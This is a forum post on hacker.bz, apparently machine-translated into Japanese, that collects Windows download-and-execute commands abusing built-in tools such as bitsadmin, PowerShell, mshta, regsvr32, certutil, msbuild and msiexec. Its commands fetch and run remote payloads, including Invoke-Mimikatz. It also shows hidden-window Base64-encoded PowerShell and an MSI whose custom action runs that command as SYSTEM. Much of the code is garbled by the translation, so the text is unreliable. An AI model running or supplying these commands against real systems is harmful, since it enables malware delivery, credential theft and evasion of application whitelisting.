タイトル：Windowsのダウンロード実行コマンドコレクション

https://hacker.bz/t/entry/1624-%E3%82%BF%E3%82%A4%E3%83%88%E3%83%AB%EF%BC%9Awindows%E3%81%AE%E3%83%80%E3%82%A6%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%89%E5%AE%9F%E8%A1%8C%E3%82%B3%E3%83%9E%E3%83%B3%E3%83%89%E3%82%B3%E3%83%AC%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3/

Followers

1.BitsAdminコマンド（指定されたパス、Win7以降にコマンドのみをダウンロードできます）：

bitsadmin/mydownloadjob/download/download/priority normal 'http://img5.5.5.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg' 'D: \ ABC.jpg' '' '' d: \

BitsAdmin /Transfer D90f 3http://Site.com/A％AppData％\ D90f.exe％AppData％\ D90f.exedel％appdata％\ d90f.exe

2.PowerShellの名前のダウンロードと実行：（ Win7以降）

PowerShell IEX（new-Object Net.WebClient）.DownLoadString（ 'https://Raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1'）; Invoke-Mimikatz

Powershell -exec bypass -f \\ webdavserver \ folder \ payload.ps1

powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\111111111111111111111.exe')

PowerShell -W Hidden -C（new-Object System.net.WebClient）.DownLoadFile（ 'http://img5.cache.netease.com/photo/0001/2013-03-28/8r1bk3qo3r710001.jpg'、 'd3360 \\ 1.jpg'）

3.mshtaコマンドダウンロードと実行

MSHTA VBScript:Close（execute（ 'getObject（' 'script:http://webserver/payload.sct' '）））））

MSHTA http://Webserver/payload.hta ---短いドメイン名：http://SINA.lt/ - MSHTA http://T.CN/RYUQYF8

mshta \\ webdavserver \ folder \ payload.hta

payload.hta

HTML

Meta http-equiv='content-type' content='text/html; charset=utf-8 '

頭

スクリプト言語='vbscript'

window.resizeto 0、0

Window.Moveto -2000、-2000

set objshell=createObject（ 'wscript.shell'）

objshell.run 'calc.exe'

self.close

/スクリプト

体

デモ

/体

/頭

/HTML

4。 rundll32コマンドダウンロードと実行

rundll32 \\ webdavserver \ folder \ payload.dll、エントリポイント

rundll32.exe javascript: '\ . \ mshtml、runhtmlapplication'; o=getobject（ 'script:3358webserver/payload.sct'）; window.close（）;

参照：https://github.com/3gstudent/javascript-backdoor

5.NET Regasmコマンドをダウンロードして実行します

c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ regasm.exe /u \ webdavserver\folder\payload.dll

6.CMDリモートコマンドのダウンロード：

cmd.exe /k \\ webdavserver \ folder \ batchfile.txt

7.REGSVR32コマンドのダウンロードと実行

regsvr32 /u /n /s /i3360http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i: \ webdavserver\folder\payload.sct scrobj.dll

regsvr32 /u /s /i:3358site.com/js.png scrobj.dll

js.png

？xmlバージョン='1.0'？

スクリプトレット

登録

progid='shortjsrat'

classId='{10001111-0000-0000-0000-0000-0000Feedacdc}'

！ - Casey Smith @Subteeから学ぶ -

スクリプト言語='jscript'

！[cdata [

ps='cmd.exe /c calc.exe';

new ActiveXObject（ 'wscript.shell'）。run（ps、0、true）;

]]

/スクリプト

/登録

/スクリプトレット

8.Certutilコマンドのダウンロードと実行

certutil -urlcache -split -f http://webserver/ペイロードペイロード

certutil -urlcache -split -f http://webserver /payload.b64 payload.b64 certutil -decode payload.b64 payload.dll c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ instalutil /logfile=ulgfile=ul gaylod.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 certutil -decode payload.b64 payload.exe payload.exe

certutil -urlcache -split -f http://site.com/a a.exe a.exe del a.exe certutil -urlcache -f http://192.168.254.102:80/a Delete

9.net 9.net

でmsbulidコマンドをダウンロードして実行します

cmd /v /c 'set mb=' c: \ windows \ microsoft.net \ framework64 \ v4.0.30319 \ msbuild.exe '！mb！ /noauteresponse /preprocess \\ webdavserver \ folder \ payload.xml payload.xml！mb！ payload.xml '

10。 ODBCCONFコマンドのダウンロードと実行

odbcconf /s /a {regsvr \\ webdavserver \ folder \ payload_dll.txt}

11.cscriptスクリプトリモートコマンドのダウンロードと実行

cscript/b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 Script:https://raw.githubusercontent.com/3gstudent/test/master/downdoadexec3.sct

cscript //e:jscript \\ webdavserver \ folder \ payload.txt

downfile.vbs:

'設定を設定します

strfileurl='https://hacker.bz/t/tu/ckhxbukkqru9204.jpg'

strhdlocation='c: \ logo.jpg'

'ファイルを取得します

set objxmlhttp=createObject（ 'msxml2.xmlhttp'）

objxmlhttp.open 'get'、strfileurl、false

objxmlhttp.send（）

objxmlhttp.status=200の場合

objadostream=createObject（ 'adodb.stream'）を設定します

objadostream.open

objadostream.type=1 'adtypebinary

objadostream.write objxmlhttp.responsebody

objadostream.position=0'STREMの位置を開始までセットします

set objfso=createObject（ 'scripting.filesystemobject'）

objfso.fileexists（strhdlocation）の場合、objfso.deletefile strhdlocation

objfso=何も設定しません

objadostream.savetofile strhdlocation

objadostream.close

objadostream=Nothingを設定します

ifを終了します

objxmlhttp=何も設定しません

上記をdownfile.vbsとして保存します

コマンドを入力してください：cscript downfile.vbs

12.pubprn.vbsコマンドをダウンロードして実行

cscript /b c: \ windows \ system32 \ printing_admin_scripts \ zh-cn \ pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.scs

13.windowsには独自のコマンドコピーが付属しています

コピー\\ x.x.x.x \ xx \ poc.exe

Xcopy D: \ test.exe \\ x.x.x \ test.exe

14。 iexplore.exeコマンドをダウンロードして実行します（つまり、odayが必要です）

'C: \ Program Files \ Internet Explorer \ iexplore.exe' http://site.com/exp

15.ieexcコマンドのダウンロードと実行

c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ caspol -s off

c: \ windows \ microsoft.net \ framework \ v2.0.50727 \ ieexec http://site.com/files/test64.exe

参照：https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

16。 msiexecコマンドのダウンロードと実行

msiexec /q /i https://hacker.bz/t/tu/icr2sy1pdlx9205.png

この方法は、以前の2つの記事《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》で紹介されています。この方法を紹介しましたが、詳細を繰り返しません。

まず、Base64エンコーディングは、PowerShell実装のダウンロードと実行のコードとして使用されます。

$ filecontent='（new-Object System.net.webclient）.downloadfile（' https://github.com/3gstudent/test/raw/master/putty.exe '、' c: \ download \ a.exe '）; start-process' c3360

$ bytes=[system.text.encoding] :3360Unicode.getBytes（$ filecontent）;

$ encoded=[System.Convert] :3360TOBASE64STRING（$ bytes）;

$エンコード

得る：

kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==

完全なPowerShellコマンドは次のとおりです。

PowerShell -WindowStyle Hidden -Ec kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==

完全なWIXファイルは次のとおりです。

？xmlバージョン='1.0'？

WIX XMLNS='http://SCHEMAS.MICROSOFT.COM/WIX/2006/WI'

製品ID='*' upgradeCode='12345678-1234-1234-1234-11111111111111111111111111111111111111111111111111111111111111111年目の例

名前'バージョン=' 0.0.1 'メーカー='@_ xpn_ '言語=' 1033 '

パッケージinstallerversion='200'圧縮='はい'コメント='Windowsインストーラーパッケージ'/

メディアID='1' /

ディレクトリid='targetdir' name='sourcedir'

ディレクトリID='ProgramFilesFolder'

ディレクトリid='installlocation' name='example'

Component Id='ApplicationFiles' Guid='12345678-1234-1234-1234-2222222222222222222222222222222222222222

/成分

/ディレクトリ

feature id='defaultfeature' level='1'

componentref id='applicationFiles'/

/特徴

プロパティID='CMDLINE'POWERSHELL -WINDOWSTYLE HIDDEN -ENC kabuaguadwatag8aygbqaguaywb0acaauwb55ahmadablag0algboaguadauafcazqbiaemababguabguabgB0Ackalgbeag8adwbuagwabw bhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwazagcacwb0ahuazablag4adavahqazqbz ahqalwbyageadwavag0ayqbzahqazqbyac8acab1ahqadab5ac4azqb4aguajwasaccaywa6afwazabvahcabgbsag8ayqbkafwayqaua guaeablaccaka7ahmadabhahiaatahaacgbvagmazqbzahmaiaanagmaogbcagqabwb3ag4abvageazabcagealgblahgazqanaa==

/財産

Customaction ID='SystemShell' execute='Deferred' Directory='TargetDir'

execommand='[cmdline]' return='無視' Imprionate='no'/

customaction id='failinstall' execute='deferred' script='vbscript' return='check'

VBSがインストールに失敗するように無効になりました

/カスタムアクション

InstallexecuteSequence

カスタムアクション='Systemshell' after='installInitialize'/custom

カスタムアクション='failinstall' before='installfiles'/custom

/installexecuteSequence

/製品

/wix

コンパイルしてMSIファイルを生成します。コマンドは次のとおりです。

candle.exe msgen.wix

light.exe msgen.wixobj

test.msiを生成します

実装関数：msiexec/q/i 3https://github.com/3gstudent/test/raw/master/test.msi

注：実行後、プロセスを手動で終了する必要がありますmsiexec.exe

Baiduが提供する短いアドレスサービス（http://dwz.cn/）と組み合わせると、実装コードは34文字で、コードは次のとおりです。

msiexec /q /i http://dwz.cn/6ujpf8

17。コマンドをダウンロードして、Project GreatSct

を実行します

https://github.com/greatsct/

Sign In